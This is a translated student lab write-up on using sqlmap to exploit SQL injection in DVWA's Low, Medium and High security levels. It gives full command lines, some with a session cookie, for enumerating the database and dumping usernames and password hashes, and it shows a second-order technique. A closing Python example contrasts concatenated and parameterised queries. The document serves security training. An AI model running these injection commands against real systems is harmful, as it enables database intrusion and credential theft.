[Student Share] Using sqlmap to Crack SQL Injection in the DVWA Lab


Author: 啊昊 (student of the WEB Security Attack and Defense Planet)


LOW level



Try a normal submission:

Check the URL:

http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#

Check the cookie:

cookie: security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5

The URL shows that the form is submitted with the GET method. Run sqlmap against this URL:

C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5"

sqlmap reports that an injection point exists; answer no at the prompt and move on to the next stage of the injection.

Show the current database:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --current-db

List the tables:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --tables -D "dvwa"

List the columns of the users table:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --columns -D "dvwa" -T "users"

Dump the user and password columns of the table:

C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --dump -D "dvwa" -T "users" -C "user,password"

The results come back, and the hash values are worked out:


Medium level


Submit a normal request:

URL:

http://www.d.com/DVWA-1.9/vulnerabilities/sqli/#

Cookie value:

security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5

Test with the same method as the first time:
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
sqlmap reports an error.

Inspect the request:
POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/
Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

id=1&Submit=Submit

The request is submitted to /DVWA-1.9/vulnerabilities/sqli/, and the submitted data is id=1&Submit=Submit.

So test with sqlmap using the following command:

sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/" --cookie "security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --data "id=1&Submit=Submit"

The expected result arrives:

OK, repeating the LOW-level steps now yields the users' account names and passwords.


High level

Submit a normal request:

The page redirects. Does that mean sqlmap no longer works? Trying the Medium-level method finds no vulnerability, because the page has already redirected. Don't panic, we still have the --second-order option!
First, capture the request:
POST /DVWA-1.9/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php
Cookie: security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

id=1&Submit=Submit

As we can see, the request comes from /session-input.php and goes on to our earlier page:

/DVWA-1.9/vulnerabilities/sqli/

OK, time to give it a try.

sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --second-order "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/"

Once this appears, heh, the rest is just the same as the LOW level!
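
Added example, not from the original article or from DVWA's source: a small Python model of why the three levels differ only in how id is delivered (GET parameter, POST body, value stored by session-input.php and read back on the next page) and not in what happens at the query, shown beside a hardened lookup that validates and binds the value. The SQLite table, its rows and all function names are constructed for illustration, and string concatenation in the lab's query is an assumption.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab database (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("1", "alice", "hash-a"), ("2", "bob", "hash-b"),
                      ("3", "carol", "hash-c")])
    return conn

def lookup_concat(conn, user_id):
    """Weak form (assumed): the value becomes part of the SQL text."""
    sql = "SELECT user FROM users WHERE user_id = '%s'" % user_id
    return [row[0] for row in conn.execute(sql)]

def lookup_bound(conn, user_id):
    """Hardened form: accept only ASCII digits, then bind as a parameter."""
    if not (user_id.isascii() and user_id.isdigit()):
        return []
    sql = "SELECT user FROM users WHERE user_id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def id_from_request(level, get=None, post=None, session=None):
    """Hypothetical helper: where each level takes the id from."""
    if level == "low":       # GET query string
        return (get or {}).get("id", "")
    if level == "medium":    # POST body
        return (post or {}).get("id", "")
    # high: stored by an earlier page, read back from the session here
    return (session or {}).get("id", "")

def compare(value):
    """Send one value down every delivery path and into both lookups."""
    conn = make_db()
    result = {}
    for level in ("low", "medium", "high"):
        src = {"id": value}
        uid = id_from_request(level, get=src, post=src, session=src)
        result[level] = (lookup_concat(conn, uid), lookup_bound(conn, uid))
    return result

if __name__ == "__main__":
    for value in ("1", "1' OR '1'='1"):   # constructed inputs
        for level, (weak, bound) in compare(value).items():
            print(f"{level:6} {value!r:16} concat={weak} bound={bound}")
```

A value read back from the session was still supplied by the same client one request earlier, so the fix belongs at the query rather than at the page that receives the input.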


Summary

sqlmap really is a superb injection tool!!!






This article was first published on the WeChat official account (Ms08067安全实验室): [Student Share] Using sqlmap to Crack SQL Injection in the DVWA Lab
